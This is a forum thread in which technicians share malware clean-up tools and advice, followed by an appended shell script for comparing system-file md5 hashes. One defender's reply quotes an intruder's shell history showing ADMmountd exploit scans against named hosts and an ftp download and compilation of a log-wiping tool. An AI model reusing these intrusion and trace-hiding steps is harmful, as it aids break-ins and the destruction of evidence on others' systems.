Worst Security Clean-Up You've Performed?
nakhla writes "Last night, I was tasked (by my wife) to help fix her friend's computer. It is a Windows XP home system which has been running slowly, almost to the point of unusability (like *that's* never happened before). It turns out that hundreds of random processes had filled up its meager 256 MB of RAM. The cause? Nearly 7,500 viruses and worms that had infected the system. That number doesn't even include the hundreds of spyware and adware programs that had installed themselves, as well. Although the box is now behind a firewall, that wasn't always the case. This was, by far, the most infected system I'd ever seen, but I'm sure it can't be the worst ever. What was the worst security cleanup you ever had to perform?"
Here's my toolkit... (Score:2, Informative)
I've been working in the small shop/repair business for over 5 years, and it's a weekly experience to get a machine in with thousands of trojans, viruses and spy apps. In cases where a re-install may not be desirable or feasible, here's a list of the tools we use to find, isolate and eradicate hostile software.
Disclaimer: I do not work for any of these companies, nor am I being paid anything by them. I just find that these tools work. Your mileage may vary.
1: Antivirus
As most of our customers are home users, we can recommend Grisoft's AVG as the most capable and reasonably priced ':)' antivirus out there. It does a pretty good job, and the installers are kept up to date so you don't have to fudge around with d'loading on a broken box.
AVG Free [grisoft.com]
2: Anti-Spyware
No-brainer. The best two in the business. Spybot and Ad-Aware. They don't get everything, but they both do a darn good job, and can even set themselves up to run on reboot before some of the uglies get going. We leave them on the system so we can attempt to train the user towards a safer future.
Ad-Aware Personal [lavasoftusa.com]
SpyBot S&D [safer-networking.org]
3: Process Viewers
Now this gets a little harder. Neither of these tools will do the job automatically, but with care, can show you the files and processes that are the center of these little problems. Personally, I like MS/Sysinternals Process Explorer, my boss prefers PrcView. As an interesting note: You'll occasionally find a hostile that can stop certain known process viewers from starting up. Get the old 95/98 version of PrcView. They always seem to miss that one. Recording the file name of the app, rebooting to the recovery console, and going in to hand delete the app works 98% of the time.
PrcView [teamcti.com]
Process Explorer [microsoft.com]
Now, the easy route....
Get yourself one of these: USB HDD Adapter Kit [tigerdirect.com] from your favourite retailer, and just hook the offending HDD up to a good machine with an up-to-date anti-virus scanner. You will have some broken startup and registry entries left over, but they're pretty simple in comparison.
I'd normally say "Enjoy!" at this juncture. But you probably won't.
Best of Luck
kgs
Re: HOW did you clean it up? (Score:3, Informative)
I know what I'll do next time.
Script Kiddie Hunt (Score:3, Informative)
It was pretty good about cleaning up after its last logs, but I finally managed to stumble into the kiddie's home dir on my box... the damned kiddie forgot to clean up his
Looking at that (also Redhat 5.x) server's web site, I noticed that it had some evil users who exposed
So I cleaned up some other computer as well as mine. That was pretty much the time I migrated to Debian for good... haven't had nary a problem before or since.
Anyway, here are some annotated excerpts from the
blksheep/.bash_history
cd
cd
ls
ADMmountd liuxcentral.com -t 0 # plenty of typos while "scanning" for vulnerable hosts
ADMmountd linuxcentral.com -t 0
ADMmountd www.mondenet.com -t 0
# retrieving the logfile cleaning utility, which didn't work on
ftp goethe.sbu.edu
mv utclean.wri utclean.c
gcc utclean.c -o utlcean
mv utlcean
mv utlcean utclean
chmod +x utclean
# Testing his rootkit
who
ls
screen find / -name
ls
cat blah
rm blah
cat
Re:HOW did you clean it up? (Score:4, Informative)
You don't. It is not worth the time and effort unless your personal / professional time has zero value. Get your data off and reinstall / restore from image.
Otherwise (if you are getting paid well for it) you can boot off a live CD or install the drive as a second in another system (one that has all the autorun crap disabled), run AV/AS(pyware) on the drive, edit the registry removing all the startup items that you know aren't needed, run md5 comparisons on all the system files, and go from there. Dumping the registry and comparing with a known good registry is helpful at spotting crap.
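The md5 comparison this reply describes, as an added example that is not from the thread: a POSIX shell script that hashes a known-good file tree once, then verifies a suspect drive (mounted from a live CD or as a second disk) against that manifest, reporting modified, missing and extra files. It assumes both trees are plain directories, paths contain no spaces, and the clean manifest is non-empty; the demo data at the bottom is constructed.

```shell
#!/bin/sh
# Added example: baseline-and-verify for system files (not the thread's code).

# Write a sorted "md5  ./relative/path" manifest of every file under DIR.
hash_tree() {
    ( cd "$1" && find . -type f | sort | while IFS= read -r f; do md5sum "$f"; done )
}

# Compare two manifests (clean, suspect). Prints MODIFIED / MISSING / EXTRA
# per differing path, sorted; prints nothing when the trees match.
diff_manifests() {
    awk 'NR == FNR { clean[$2] = $1; next }
         {
             seen[$2] = 1
             if (!($2 in clean))        print "EXTRA " $2
             else if (clean[$2] != $1)  print "MODIFIED " $2
         }
         END { for (p in clean) if (!(p in seen)) print "MISSING " p }' "$1" "$2" | sort
}

# Verify suspect DIR against a saved clean manifest. Status 0 = identical,
# 1 = differences found (printed to stdout), 2 = could not create a temp file.
verify_tree() {
    manifest=$1; dir=$2
    tmp=$(mktemp) || return 2
    hash_tree "$dir" > "$tmp"
    findings=$(diff_manifests "$manifest" "$tmp")
    rm -f "$tmp"
    if [ -n "$findings" ]; then printf '%s\n' "$findings"; return 1; fi
    return 0
}

# Constructed demo: a tiny "clean install" and a tampered copy of it.
demo() {
    work=$(mktemp -d) || return 2
    mkdir -p "$work/clean/system32" "$work/suspect"
    printf 'original kernel' > "$work/clean/system32/kernel32.dll"
    printf 'original shell'  > "$work/clean/explorer.exe"
    cp -R "$work/clean/." "$work/suspect"
    hash_tree "$work/clean" > "$work/clean.md5"                 # baseline, taken once
    printf 'tampered' > "$work/suspect/system32/kernel32.dll"   # modified file
    rm "$work/suspect/explorer.exe"                             # missing file
    printf 'unknown'  > "$work/suspect/system32/unknown.exe"    # extra file
    rc=0
    verify_tree "$work/clean.md5" "$work/suspect" || rc=$?
    rm -rf "$work"
    return $rc
}
```

Run `demo` to see the three findings; for a real drive, take the baseline from a clean install of the same patch level and point `verify_tree` at the suspect mount point.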